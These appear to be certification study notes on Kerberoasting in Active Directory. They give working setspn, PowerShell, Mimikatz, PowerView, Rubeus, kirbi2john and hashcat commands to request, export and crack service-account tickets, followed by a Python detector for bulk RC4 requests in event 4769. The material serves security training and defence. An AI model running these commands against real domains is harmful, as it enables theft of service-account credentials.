OSCP-CPTS NOTES
Kerberoasting - From Windows

Last updated 1 month ago

Semi Manual Method

  • C:\> setspn.exe -Q */* → lists the SPNs registered in the domain

  • PS C:\> Add-Type -AssemblyName System.IdentityModel

  • PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL:1433"

    • The Add-Type cmdlet adds a .NET Framework class to our PowerShell session, which can then be instantiated like any other .NET Framework object

    • The AssemblyName parameter lets us specify the assembly that contains the types we want to use

    • System.IdentityModel is a namespace that contains different classes for building security token services

    • We then use the New-Object cmdlet to create an instance of a .NET Framework object

    • We use the System.IdentityModel.Tokens namespace with the KerberosRequestorSecurityToken class to create a security token, and pass the SPN to the class to request a Kerberos TGS ticket for the target account in our current logon session

This requests a TGS ticket for the account and loads it into memory, from where we later extract it using Mimikatz.

  • PS C:\> setspn.exe -T DOMAIN.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } → request tickets for all accounts with SPNs set.

Now let's extract the tickets with Mimikatz:

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export

<SNIP>

[00000002] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2/24/2022 3:36:22 PM ; 2/25/2022 12:55:25 AM ; 3/3/2022 2:55:25 PM
   Server Name       : MSSQLSvc/DEV-PRE-SQL:1433 @ DOMAIN.LOCAL
   Client Name       : USERNAME @ DOMAIN.LOCAL
   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
====================
Base64 of file : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi
====================
doIGPzCCBjugAwIBBaEDAgEWooIFKDCCBSRhggUgMIIFHKADAgEFoRUbE0lOTEFO
RUZSRUlHSFQuTE9DQUyiOzA5oAMCAQKhMjAwGwhNU1NRTFN2YxskREVWLVBSRS1T
UUwuaW5sYW5lZnJlaWdodC5sb2NhbDoxNDMzo4IEvzCCBLugAwIBF6EDAgECooIE
<...................SNIP...................>
LkxPQ0FMqTswOaADAgECoTIwMBsITVNTUUxTdmMbJERFVi1QUkUtU1FMLmlubGFu
ZWZyZWlnaHQubG9jYWw6MTQzMw==
====================

   * Saved to file     : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi

<SNIP>

If we do not specify base64 /out:true, Mimikatz writes the extracted tickets to .kirbi files instead of printing them as base64.

  • Decode this base64 blob and save it as the file sqldev.kirbi

  • Then run kirbi2john against it to extract the ticket hash.

  • sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\1\$\2/' crack_file > sqldev_tgs_hashcat → rewrite the hash into Hashcat's format (both capture groups need the escaped \( \) in sed's basic regex syntax, otherwise \2 is an invalid reference)

    $krb5tgs$23$sqldev.kirbi$813149fb261549a6a1b38e71a057feeab → the result will look something like this

  • hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt → finally crack the hash (mode 13100 is Kerberos 5 TGS-REP, etype 23).

Automated / Tool Based Route

  • setspn.exe -Q */* → list available SPNs

Using PowerView

  • PS C:\> Import-Module .\PowerView.ps1 → import PowerView

  • PS C:\> Get-DomainUser * -spn | select samaccountname → list accounts that have an SPN set

  • PS C:\> Get-DomainUser -Identity username | Get-DomainSPNTicket -Format Hashcat → target a specific user

  • PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation → export all tickets to a CSV file

Using Rubeus

Rubeus does not need us to explicitly set the SPN or the user.

  • PS C:\> .\Rubeus.exe kerberoast /stats → get the stats

  • PS C:\> .\Rubeus.exe kerberoast

    We can add the /nowrap flag so that the hash is printed on a single line, which makes it easier to feed to Hashcat.

    We can also use /outfile:filename to save the hashes to a file instead of displaying them.

  • PS C:\> .\Rubeus.exe kerberoast /user:testspn /nowrap → for a specific user.

We can use the /tgtdeleg flag to specify that we want only RC4 encryption when requesting a new service ticket.

RC4 (etype 23, shown as 0x17 rc4_hmac_nt in the Mimikatz listing above) is much faster to crack than AES-128 or AES-256.
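The defender's view of the same behaviour: the bulk ticket request earlier on this page and the RC4 preference just described both show up in Security event 4769 (Kerberos service ticket requested) as one requester pulling RC4 (0x17) tickets for many user-account SPNs in a short burst. The following Python is an added example, not part of the original notes; the 4769 lines are constructed (field names follow the event schema, the account names, hosts and IPs are made up).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (Kerberos service ticket requested), one
# event per line. Field names follow the 4769 schema; accounts, hosts and IPs are made up.
SAMPLE_4769 = """\
2022-02-24T15:36:22 TargetUserName=USERNAME@DOMAIN.LOCAL ServiceName=sqldev TicketEncryptionType=0x17 IpAddress=10.0.0.50
2022-02-24T15:36:22 TargetUserName=USERNAME@DOMAIN.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.50
2022-02-24T15:36:23 TargetUserName=USERNAME@DOMAIN.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.50
2022-02-24T15:36:23 TargetUserName=USERNAME@DOMAIN.LOCAL ServiceName=DC01$ TicketEncryptionType=0x17 IpAddress=10.0.0.50
2022-02-24T15:36:23 TargetUserName=USERNAME@DOMAIN.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.50
2022-02-24T15:40:01 TargetUserName=alice@DOMAIN.LOCAL ServiceName=sqldev TicketEncryptionType=0x12 IpAddress=10.0.0.21
2022-02-24T09:00:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_legacy TicketEncryptionType=0x17 IpAddress=10.0.0.22
2022-02-24T11:30:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.0.0.22
2022-02-24T14:00:00 TargetUserName=bob@DOMAIN.LOCAL ServiceName=sqldev TicketEncryptionType=0x17 IpAddress=10.0.0.22
"""

RC4_HMAC_NT = "0x17"  # etype 23, the encryption type shown for the ticket in the Mimikatz listing above
def parse_4769(line):
    # Split one flattened 4769 line into a dict; the leading timestamp becomes a datetime.
    ts, rest = line.split(" ", 1)
    fields = dict(re.findall(r"(\w+)=(\S+)", rest))
    fields["ts"] = datetime.fromisoformat(ts)
    return fields

def is_user_service(service_name):
    # Computer accounts end in '$' and krbtgt is the TGT service itself; only
    # user accounts with an SPN give a ticket worth cracking, so only those count.
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"

def kerberoast_alerts(log_text, window_s=300, min_services=3):
    """Return {(requesting user, ip): n} for requesters that got RC4 service tickets for
    at least min_services distinct user accounts within window_s seconds (bulk-request pattern)."""
    window = timedelta(seconds=window_s)
    by_requester = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_4769(line)
        if ev["TicketEncryptionType"] == RC4_HMAC_NT and is_user_service(ev["ServiceName"]):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)
    alerts = {}
    for key, evs in by_requester.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            # distinct service accounts requested within the window opened by this event
            services = {e["ServiceName"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(services) >= min_services:
                alerts[key] = max(alerts.get(key, 0), len(services))
    return alerts
```

With the sample data, kerberoast_alerts(SAMPLE_4769) flags only USERNAME from 10.0.0.50 (three user SPNs in one second); bob's three RC4 requests spread over five hours and alice's AES request stay below the threshold unless the window is widened.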
